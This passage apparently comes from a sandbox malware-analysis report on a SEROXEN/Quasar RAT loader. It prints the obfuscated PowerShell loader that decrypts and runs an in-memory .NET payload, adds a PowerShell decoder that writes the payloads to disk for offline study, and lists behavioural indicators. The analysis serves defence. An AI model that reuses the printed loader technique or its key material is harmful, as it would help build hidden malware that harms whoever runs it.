[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e501f1c1-975e-43a2-8573-35497546766a}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{28beff50-36c5-4596-8c14-43feb29a3939}
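The two loaders in this tree share one construction: stage 1 (Handler.bat.exe, a renamed PowerShell host) reads the line of Handler.bat that starts with `SEROXEN`, splits it on `\`, and turns each half into a .NET assembly by base64-decoding, AES-256-CBC/PKCS7-decrypting with a hard-coded key and IV, and GZip-decompressing it before `Assembly.Load` and `EntryPoint.Invoke`. Stage 2 (`$sxr-powershell.exe`) is the same pipeline with a second key/IV, except that the registry hive, subkey, value name, member names and process name are themselves AES-encrypted constants, and the `.NET` member names in both stages are spelled backwards and re-read with `'...'[-1..-N] -join ''`. The hop in between, `$sxr-cmd.exe /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%`, is cmd's `%VAR:old=new%` substitution: it strips the `&#<?` filler from an environment variable and runs the result, which is why the stage-2 command line only appears in the child. The following decoder is an added example written for this page, not code from the sample, the sandbox or SEROXEN: it reuses the loaders' own decryption pipeline and key material (copied from the command lines above) but never loads or invokes anything, writing the recovered assemblies to disk instead. `$OutDir` is an assumption, and the script can only recover stage 1 and stage 2 on a host where Handler.bat and the registry value exist, since neither blob is included in the report.

```powershell
# Added example, not code from the sample, the sandbox, or SEROXEN: a static decoder
# for the two loader stages in the process tree above. It re-implements their own
# base64 -> AES-256-CBC/PKCS7 -> GZip pipeline but never calls Assembly.Load or
# EntryPoint.Invoke; recovered payloads are written to disk for offline analysis.
# Assumed (not on the page): $OutDir, and that Handler.bat and the registry value
# read by stage 2 exist on the host, since neither blob is included in the report.
param(
    [string]$BatPath = 'C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat',
    [string]$OutDir  = (Join-Path $env:TEMP 'seroxen_out')
)
# Key/IV pairs copied verbatim from the Handler.bat.exe and $sxr-powershell.exe command lines.
$Stage1 = @{ Key = 'z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='; IV = 'oe8taAs+mjon3dfZMtxPIg==' }
$Stage2 = @{ Key = '2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='; IV = 'dQc6M4a1U8SkygTmibGyDg==' }

function Unreverse-Names {
    # Resolve ('gnirtS46esaBmorF'[-1..-16] -join '') style tokens: the literal is the member
    # name spelled backwards ('FromBase64String' here), re-read from its last character.
    param([string]$Text)
    $eval = [System.Text.RegularExpressions.MatchEvaluator]{
        param($m); $v = $m.Groups[1].Value; -join $v[-1..(-$v.Length)] }
    [regex]::Replace($Text, "\('([^']+)'\[-1\.\.-\d+\] -join ''\)", $eval)
}
function Invoke-AesCbcDecrypt {
    param([byte[]]$Data, [hashtable]$Stage)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($Stage.Key)   # 32 bytes, i.e. AES-256
    $aes.IV  = [Convert]::FromBase64String($Stage.IV)    # 16 bytes, fixed per stage
    $dec = $aes.CreateDecryptor()
    try { $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length) } finally { $dec.Dispose(); $aes.Dispose() }
    ,$plain
}
function Expand-Gzip {
    param([byte[]]$Data)
    $in = New-Object System.IO.MemoryStream(,$Data); $out = New-Object System.IO.MemoryStream
    $gz = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    $gz.CopyTo($out); $gz.Dispose(); $in.Dispose(); $bytes = $out.ToArray(); $out.Dispose()
    ,$bytes
}
function ConvertFrom-SeroxenBlob {
    # Same order both loaders use; the result is the raw .NET assembly they would Load().
    param([string]$B64, [hashtable]$Stage)
    Expand-Gzip (Invoke-AesCbcDecrypt ([Convert]::FromBase64String($B64)) $Stage)
}
function Save-Payload {
    param([byte[]]$Bytes, [string]$Name)
    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    $path = Join-Path $OutDir $Name; [IO.File]::WriteAllBytes($path, $Bytes)
    $isPe = ($Bytes.Length -gt 2) -and ($Bytes[0] -eq 0x4D) -and ($Bytes[1] -eq 0x5A)
    '{0}  {1} bytes  MZ={2}  SHA256={3}' -f $path, $Bytes.Length, $isPe, (Get-FileHash -Algorithm SHA256 $path).Hash
}

# The reversal trick on a fragment of the stage-1 command line (yields the plain .NET call).
Unreverse-Names "[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]`$bytes)"

# Stage-2 string constants (ciphertext copied from the page) and the role the loader
# gives each one, read off how the command line uses it.
$Consts = [ordered]@{
    'coosp  (Registry hive property)'            = 'W+228sMz/VVvzW5Wi2DfeQ=='
    'HssPO  (method called on the hive)'         = 'wr1hAjwP3vd25eg2X2PyLA=='
    'RVcQq  (argument: subkey path)'             = 'Nh0O9Tq4WhjVRVv6TIlxng=='
    'uooKb  (method called on the opened key)'   = 'wR0HI5liF2OH5JSIeYrcUA=='
    'OATYX  (argument: value name)'              = 'DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs='
    'RVcQq3 (process name for run-once check)'   = 'NHOzA0blhk4FfOP1QwdrHA=='
    'RVcQq1 (CompressionMode member)'            = 'KBGLdnELndsDRqQwc9+ZdQ=='
    'cqFrb  (GZipStream method)'                 = 'LnPkErAMqZ8UA2dOM3NRUw=='
    'RVcQq2 (static method on the IEX result)'   = 'h0utQU1KufGAbeZac8uGpg=='
    'RVcQq0 (EntryPoint method)'                 = 'jzKuA/Szphx4DaASO5/17A=='
    'pxqaL  (argv[0] handed to the blob0 payload)' = 'VOurjNNOAf3rWCyDVTfXEg=='
    'hunvf  (decrypted but not used)'            = 'rq5zXkyy0NL/id4X1CFNpQ=='
    'sZmZm  (expression piped to IEX)'           = 'bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc='
}
$decoded = @{}
foreach ($k in $Consts.Keys) {
    $plain = [Text.Encoding]::UTF8.GetString((Invoke-AesCbcDecrypt ([Convert]::FromBase64String($Consts[$k])) $Stage2))
    $decoded[$k.Split(' ')[0]] = $plain
    '{0,-46} -> {1}' -f $k, $plain
}

# Stage 1: the line in Handler.bat that starts with SEROXEN carries two blobs separated by '\'.
if (Test-Path $BatPath) {
    $line = Get-Content $BatPath | Where-Object { $_.StartsWith('SEROXEN') } | Select-Object -First 1
    if ($line) {
        $blobs = $line.Substring(7).Split('\')
        for ($i = 0; $i -lt $blobs.Count; $i++) { Save-Payload (ConvertFrom-SeroxenBlob $blobs[$i] $Stage1) "stage1_blob${i}.bin" }
    }
}
# Stage 2: same layout in a registry value. Hive, method and argument names are the
# decrypted constants, so this is the loader's own read expression minus the Load.
try {
    $hive = $decoded['coosp']; $open = $decoded['HssPO']; $get = $decoded['uooKb']
    $raw  = [Microsoft.Win32.Registry]::$hive.$open($decoded['RVcQq']).$get($decoded['OATYX'])
    $blobs = ([string]$raw).Split('\')
    for ($i = 0; $i -lt $blobs.Count; $i++) { Save-Payload (ConvertFrom-SeroxenBlob $blobs[$i] $Stage2) "stage2_blob${i}.bin" }
} catch { "stage-2 registry value not readable on this host: $($_.Exception.Message)" }
```

Run it from an analysis VM with the suspect user's Temp directory and registry hive mounted or copied across; the decrypted constants print even without them, and they are what the second triage step below needs (the hive, subkey and value name the persistence stage reads from). Because the loaders pipe base64 through AES before GZip, a dump taken at any one stage is still opaque; `Save-Payload` reports whether the final bytes start with `MZ` so a non-PE result flags a wrong key or a corrupted blob rather than a new payload type.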
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 26.211.222.173.in-addr.arpa | udp |
Files
memory/1468-0-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/1468-1-0x0000019E40000000-0x0000019E401BE000-memory.dmp
memory/1468-2-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-3-0x0000019E5B6D0000-0x0000019E5B7B0000-memory.dmp
memory/1468-4-0x0000019E5BA60000-0x0000019E5BC04000-memory.dmp
memory/1468-5-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/1468-10-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-11-0x0000025B7A940000-0x0000025B7A962000-memory.dmp
memory/4640-15-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-14-0x0000025B7AC30000-0x0000025B7ACA6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_izbbwn40.3f3.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4640-16-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-31-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | f7722b62b4014e0c50adfa9d60cafa1c |
| SHA1 | f31c17e0453f27be85730e316840f11522ddec3e |
| SHA256 | ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa |
| SHA512 | 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4 |
memory/1468-58-0x00007FFA60383000-0x00007FFA60384000-memory.dmp
memory/1468-63-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4640-64-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4588-65-0x0000029F18000000-0x0000029F18024000-memory.dmp
memory/4588-68-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
memory/4588-69-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp
memory/4640-70-0x00007FFA60380000-0x00007FFA60D6C000-memory.dmp
memory/4588-71-0x0000029F182F0000-0x0000029F18D40000-memory.dmp
memory/4588-73-0x0000029F18D40000-0x0000029F18DE6000-memory.dmp
memory/4588-88-0x0000029F18DF0000-0x0000029F18E46000-memory.dmp
memory/4588-89-0x0000029F18E50000-0x0000029F18EA8000-memory.dmp
memory/4588-90-0x0000029F18EB0000-0x0000029F18ED2000-memory.dmp
memory/4588-93-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
memory/4588-101-0x0000029F19160000-0x0000029F1916A000-memory.dmp
memory/656-102-0x0000000140000000-0x0000000140004000-memory.dmp
memory/656-103-0x0000000140000000-0x0000000140004000-memory.dmp
memory/1632-105-0x0000000000400000-0x0000000000406000-memory.dmp
memory/1632-106-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 98447a7f26ee9dac6b806924d6e21c90 |
| SHA1 | a67909346a56289b7087821437efcaa51da3b083 |
| SHA256 | c162abe51a04727507be4f98b95db6356dd64decd042dfb4090e57fa0101f2ed |
| SHA512 | c708672a28072c7754eb99f0cf2aa81bf7205d8512ae44242848c2160acf26454029bfb4b76f928bac27a3bed260f95a71bd12bcf2620865b756ba89d66f261b |
C:\Windows\$sxr-cmd.exe
| MD5 | 94912c1d73ade68f2486ed4d8ea82de6 |
| SHA1 | 524ab0a40594d2b5f620f542e87a45472979a416 |
| SHA256 | 9f7ebb79def0bf8cccb5a902db11746375af3fe618355fe5a69c69e4bcd50ac9 |
| SHA512 | f48a3b7a2e6426c0091bb159599921b8e4644c8ae83a2a2a82efc9d3e21e4e343d77339917d8aabed6d8025142a2a8e74bf1fa759edb6146bc6e39fbece9e05d |
memory/3928-165-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp
memory/3928-164-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
memory/4588-171-0x00007FFA7CDA0000-0x00007FFA7CE4E000-memory.dmp
memory/4588-170-0x00007FFA7CE90000-0x00007FFA7D06B000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-08-18 13:35
Reported
2024-08-18 13:37
Platform
win10v2004-20240802-en
Max time kernel
60s
Max time network
56s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4124 created 4332 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 5264 created 6980 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 6924 created 6212 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Windows\$sxr-mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Hide Artifacts: Hidden Window
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\dllhost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
